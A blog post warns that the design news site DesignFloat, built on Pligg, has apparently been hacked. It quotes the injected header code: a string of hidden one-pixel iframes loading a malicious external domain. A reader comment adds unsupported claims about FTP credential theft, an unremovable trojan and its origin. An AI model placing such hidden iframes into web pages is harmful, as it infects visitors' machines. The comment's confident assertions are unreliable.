DesignFloat and Pligg Hacked Again? Malicious Software Warning
DesignFloat has suffered more than it’s fair share of pligg related problems, hacks, database corruptions in the past so much so we wrote an article not long ago asking whether DesignFloat needed to move away from Pligg to survive. It would seem that the question we put forward in that particular article has been clearly answered as yes it must, if you visit DesignFloat at the moment you will have your PC unwittingly infected with malicious software indicating design float has been hacked an a hidden iframe inserted within the sites header.
First off we advise anyone reading this article not to visit DesignFloat at the moment until it is given the all clear, hence we haven’t linked to the site from within this article.
It is well documented that the Pligg system is an absolute nightmare for Spam and security vulnerabilities and DesignFloat unfortunatley has suffer at the hand of many, many problems caused solely by choosing and using Pligg as it’s system. Today we were tipped off that DesignFloat was now spitting out Malicious Site warnings to users luckily enough to be using the excellent Avast Anti Virus protection.
Below is an image of these warnings on DesignFloat.
Below is the actual code snippet that has been injected into the DesignFloat website which you can easily see with a Show Source of webpage from the DesignFloat site.
<iframe src="http://nakulpi.net/?click=66FB4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://nakulpi.net/?click=91B3C" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://nakulpi.net/?click=73A96" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://nakulpi.net/?click=6A422" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://nakulpi.net/?click=78CFB" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://nakulpi.net/?click=96F77" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
This hacking is just the latest problem that DesignFloat has suffered during it’s lifetime and one more from the many reasons to steer clear of Pligg. Many other Pligg websites have also suffered this fate with a huge amount of them now closed down and leading to parking pages on domain accounts.
Lets hope Andrew who founded DesignFloat finds a solution to the problems Pligg has caused him over the past few years and let’s hope that it doesn’t become yet another failed Pligg site statistic which is where it seems to be heading unfortunatley.
Update: After contacting Andrew alerting him to the malware infection it has been brought to our attention that DesignFloat was in fact sold in September last year to an undisclosed buyer. Looks like Andrew got sick of the vast amount of headaches using Pligg brings with it and sold up. We imagine Andrew is now more content without Pligg in his life but it’s still a sad day as we loved what Andrews idea was and in the beginning DesignFloat was an excellent resource. It’s just a shame that using Pligg caused this great concept to fail, let it be a warning to all.
We wish Andrew all the best in his future endeavors.
If you enjoyed this post, make sure you subscribe to our RSS feed!
Hi,
I would like to tell something i know about the virus.
It infects websites thru FTP and not by exploiting scripts.
When a user login to his FTP in a infected system it logs in username and pass. something like keylogger. Then in a 24hrs time an iframe tag with the malicious code will be placed in as many files as possible.
When a user opens the infected site it will redirect to somesite which will then try to download PDF. now the virus has been DOWNLOADED to your temp. At this point your virus scanner is not detecting the virus/trojan it is impossible to remove it except formatting the HD.
After a detailed search the virus origin seems to be romania.
Even it infected wordpress. search for xtrarobotz.com